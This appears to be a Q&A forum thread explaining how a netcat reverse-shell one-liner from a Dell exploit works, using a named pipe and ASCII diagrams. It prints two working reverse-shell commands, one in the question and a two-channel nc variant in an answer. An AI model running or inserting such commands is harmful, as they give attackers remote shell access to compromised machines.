# Can pipe | shell | nc > pipe achieve remote shell?

Tags: shellcode, reverse-shell, netcat

In one of the articles I have came across an exploit of Dell devices that said when you trigger the following line of code (executed somewhere in php) you will get a remote root shell :

```
mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.100 4444 >/tmp/f
```

I understand the part that by creating the fifo pipe and piping it to bash we can send shell commands on that pipe but why pipe it to `nc` and then redirect command to this pipe again?

Answer (score 3, accepted):

This code expects there to be a server (eg. a copy of `nc` in server mode) listening on port 4444 of 192.168.1.100.  When you run it, any output from the server becomes input for the shell; conversely, output from the shell becomes input for the server.  Breaking the command down into pieces for easier understanding,

`mkfifo /tmp/f;`: This creates a named pipe.

`cat /tmp/f|/bin/sh -i`: This creates an interactive shell on the local machine and hooks the output of the pipe to the shell's input.

`2>&1|nc 192.168.1.100 4444`: This takes the output of the shell and sends it over the network to a machine listening on port 4444 at 192.168.1.100.

`>/tmp/f`: This takes the output of `nc` (ie. data sent by the remote machine) and sends it to the named pipe's input, where it becomes input for the shell.

In a normal Unix command pipeline, output from earlier commands can become input for later ones, but not vice-versa, and a remote shell could only be unidirectional (you could send commands but not get output, or get output but not send commands).  Using a named pipe lets you get around this limit, and create a bidirectional remote shell.  If you're geometrically inclined, you can think of a normal pipeline as a straight line, and the named-pipe construct you found as a circle.

Answer (score 4):

This seems to be a reverse shell that creates a local shell (i. e., `/bin/sh -i`) and sends the output back to 192.168.1.100:4444 (i. e., `nc 192.168.1.100 4444`):

```
+-----------------+      +-----------------------+
| /bin/sh -i 2>&1 |----->| nc 192.168.1.100 4444 |
+-----------------+      +-----------------------+
```

Now what’s missing here is the output of the latter command being redirected back as input to the shell. And since the shell pipe `|` can only pipe the output to the command that is following it, a named pipe/FIFO file is used to connect the loose ends:

```
+------------+      +-----------------+      +-----------------------+
| cat /tmp/f |----->| /bin/sh -i 2>&1 |----->| nc 192.168.1.100 4444 |
+------------+      +-----------------+      +-----------------------+
       ^                                                  v
       +------------------ /tmp/f <-----------------------+
```

By this the output of `nc 192.168.1.100 4444` becomes the input for `/bin/sh -i`.

If you would want to make this without the named pipe/fifo, you would need two `nc` channels, one for the shell’s input and one for the shell’s output:

```
nc 192.168.1.100 4444 | /bin/sh -i 2>&1 | nc 192.168.1.100 4445
```